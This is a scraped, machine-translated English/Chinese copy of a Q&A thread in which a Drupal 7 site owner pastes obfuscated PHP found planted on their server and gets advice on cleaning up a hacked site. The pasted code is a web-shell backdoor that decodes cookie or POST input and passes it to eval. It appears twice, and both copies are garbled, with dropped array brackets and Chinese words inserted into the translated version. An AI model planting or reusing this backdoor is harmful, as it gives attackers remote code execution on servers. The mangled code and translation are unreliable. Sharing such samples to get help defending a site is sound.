简体繁体 English

Drupal 7最近的日志消息

[英]Drupal 7 Recent log messages

原文 2018-05-30 13:11:51 6 1 php/ encoding/ drupal/ drupal-7/ rackspace

I am facing with an issue. 我面临一个问题。 Everyday on my server appers .ico files and .php file with this kind of code: 每天在我的服务器上，apper.ico文件和.php文件都带有以下代码：

$zvtizrs = 'y6v1i4be#torufpkxc7_8Hg0n*-2sladm\\'';$yjzgov = Array();$yjzgov[] = $zvtizrs[30].$zvtizrs[3].$zvtizrs[30].$zvtizrs[27].$zvtizrs[1].$zvtizrs[23].$zvtizrs[30].$zvtizrs[13].$zvtizrs[26].$zvtizrs[6].$zvtizrs[20].$zvtizrs[31].$zvtizrs[30].$zvtizrs[26].$zvtizrs[5].$zvtizrs[3].$zvtizrs[27].$zvtizrs[18].$zvtizrs[26].$zvtizrs[20].$zvtizrs[3].$zvtizrs[13].$zvtizrs[27].$zvtizrs[26].$zvtizrs[1].$zvtizrs[23].$zvtizrs[5].$zvtizrs[13].$zvtizrs[5].$zvtizrs[13].$zvtizrs[23].$zvtizrs[20].$zvtizrs[30].$zvtizrs[18].$zvtizrs[17].$zvtizrs[7];$yjzgov[] = $zvtizrs[21].$zvtizrs[25];$yjzgov[] = $zvtizrs[8];$yjzgov[] = $zvtizrs[17].$zvtizrs[10].$zvtizrs[12].$zvtizrs[24].$zvtizrs[9];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[19].$zvtizrs[11].$zvtizrs[7].$zvtizrs[14].$zvtizrs[7].$zvtizrs[30].$zvtizrs[9];$yjzgov[] = $zvtizrs[7].$zvtizrs[16].$zvtizrs[14].$zvtizrs[29].$zvtizrs[10].$zvtizrs[31].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[12].$zvtizrs[6].$zvtizrs[28].$zvtizrs[9].$zvtizrs[11 $ zvtizrs ='y6v1i4be＃torufpkxc7_8Hg0n * -2sladm \\''; $ yjzgov = Array（）; $ yjzgov [] = $ zvtizrs [30]。$ zvtizrs [3]。$ zvtizrs [30]。$ zvtizrs [27]。 $ zvtizrs [1]。$ zvtizrs [23]。$ zvtizrs [30]。$ zvtizrs [13]。$ zvtizrs [26]。$ zvtizrs [6]。$ zvtizrs [20]。$ zvtizrs [31]。$ zvtizrs [30]。$ zvtizrs [26]。$ zvtizrs [5]。$ zvtizrs [3]。$ zvtizrs [27]。$ zvtizrs [18]。$ zvtizrs [26]。$ zvtizrs [20]。$ zvtizrs [3] ]。$ zvtizrs [13]。$ zvtizrs [27]。$ zvtizrs [26]。$ zvtizrs [1]。$ zvtizrs [23]。$ zvtizrs [5]。$ zvtizrs [13]。$ zvtizrs [5]。 $ zvtizrs [13]。$ zvtizrs [23]。$ zvtizrs [20]。$ zvtizrs [30]。$ zvtizrs [18]。$ zvtizrs [17]。$ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [ 21]。$ zvtizrs [25]; $ yjzgov [] = $ zvtizrs [8]; $ yjzgov [] = $ zvtizrs [17]。$ zvtizrs [10]。$ zvtizrs [12]。$ zvtizrs [24]。$ zvtizrs [9]; $ yjzgov [] = $ zvtizrs [28]。$ zvtizrs [9]。$ zvtizrs [11]。$ zvtizrs [19]。$ zvtizrs [11]。$ zvtizrs [7]。$ zvtizrs [14 ]。$ zvtizrs [7]。$ zvtizrs [30]。$ zvtizrs [9]; $ yjzgov [] = $ zvtizrs [7]。$ zvtizrs [16]。$ zvtizrs [14]。$ zvtizrs [29]。$ zvtizrs [10]。$ zvtizrs [31]。$ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [28]。$ zvtizrs [12]。$ zvtizrs [6]。$ zvtizrs [28]。$ zvtizrs [9 ]。$ zvtizrs [11 ];$yjzgov[] = $zvtizrs[30].$zvtizrs[11].$zvtizrs[11].$zvtizrs[30].$zvtizrs[0].$zvtizrs[19].$zvtizrs[32].$zvtizrs[7].$zvtizrs[11].$zvtizrs[22].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[29].$zvtizrs[7].$zvtizrs[24];$yjzgov[] = $zvtizrs[14].$zvtizrs[30].$zvtizrs[17].$zvtizrs[15];foreach ($yjzgov[7]($_COOKIE, $_POST) as $xtfjdc => $jqlwt){function frtdmz($yjzgov, $xtfjdc, $omljrbn){return $yjzgov[6]($yjzgov[4]($xtfjdc . ]; $ yjzgov [] = $ zvtizrs [30]。$ zvtizrs [11]。$ zvtizrs [11]。$ zvtizrs [30]。$ zvtizrs [0]。$ zvtizrs [19]。$ zvtizrs [32]。$ zvtizrs [7]。$ zvtizrs [11]。$ zvtizrs [22]。$ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [28]。$ zvtizrs [9]。$ zvtizrs [11]。$ zvtizrs [29] ]。$ zvtizrs [7]。$ zvtizrs [24]; $ yjzgov [] = $ zvtizrs [14]。$ zvtizrs [30]。$ zvtizrs [17]。$ zvtizrs [15]; foreach（$ yjzgov [7] （$ _COOKIE，$ _POST）as $ xtfjdc => $ jqlwt）{function frtdmz（$ yjzgov，$ xtfjdc，$ omljrbn）{返回$ yjzgov [6]（$ yjzgov [4]（$ xtfjdc）。 $yjzgov[0], ($omljrbn / $yjzgov8) + 1), 0, $omljrbn);}function htylm($yjzgov, $xwoin){return @$yjzgov[9]($yjzgov[1], $xwoin);}function twdine($yjzgov, $xwoin){$sknbn = $yjzgov3 % 3;if (!$sknbn) {eval($xwoin1);exit();}}$jqlwt = htylm($yjzgov, $jqlwt);twdine($yjzgov, $yjzgov[5]($yjzgov[2], $jqlwt ^ frtdmz($yjzgov, $xtfjdc, $yjzgov8)));} $ yjzgov [0]，（$ omljrbn / $ yjzgov8）+ 1），0，$ omljrbn）;}函数htylm（$ yjzgov，$ xwoin）{返回@ $ yjzgov [9]（$ yjzgov [1]，$ xwoin ）;}函数twdine（$ yjzgov，$ xwoin）{$ sknbn = $ yjzgov3％3; if（！$ sknbn）{eval（$ xwoin1）; exit（）;}} $ jqlwt = htylm（$ yjzgov，$ jqlwt ）; twdine（$ yjzgov，$ yjzgov [5]（$ yjzgov [2]，$ jqlwt ^ frtdmz（$ yjzgov，$ xtfjdc，$ yjzgov8）））}}

Could you please tell me what should I do? 您能告诉我该怎么办吗？ I am using rackspace hosting. 我正在使用机架空间托管。 Also I have a lot of links like this one (/d0E0MDY5VDNpanR6NDM5MzFJaQ==) in recent log. 我在最近的日志中也有很多这样的链接（/ d0E0MDY5VDNpanR6NDM5MzFJaQ ==）。 How can I stop that? 我该如何阻止呢？

Thanks in advance! 提前致谢！

1 个解决方案

Hacked. 砍死 I was recently cleaning hacked site my self and it was nightmare. 我最近正在自我清理被黑客入侵的网站，这是一场噩梦。 Best would be to retrieve some recent version from backup and immediately apply all security updates. 最好是从备份中检索一些最新版本，然后立即应用所有安全更新。 If there is no backup (big problem!) you can try "cleaning" the site as I did: 如果没有备份（大问题！），您可以尝试像我一样“清理”该站点：

Clean all the files with malicious content. 清除所有带有恶意内容的文件。 Go search/replace trough all the files. 搜索/替换所有文件。
Dump database and do the same thing to dump file - remove malicious content and then import it back. 转储数据库并执行相同的操作以转储文件-删除恶意内容，然后将其导回。
Check for user accounts. 检查用户帐户。 If there are some suspicious one block/delete them. 如果有可疑的地方，则将其阻止/删除。
Check for newly created suspicious user groups. 检查新创建的可疑用户组。 Delete them too. 也删除它们。
Make a backup. 进行备份。
Apply all security updates/patches. 应用所有安全更新/补丁。 Make fresh backup again. 再次进行全新备份。
Change all account passwords (drupal admins, ftp accounts, database accounts). 更改所有帐户密码（双倍管理员，FTP帐户，数据库帐户）。
Set scheduled backup. 设置计划的备份。 Ie use Becakup&Migrate module for that. 即为此使用Becakup＆Migrate模块。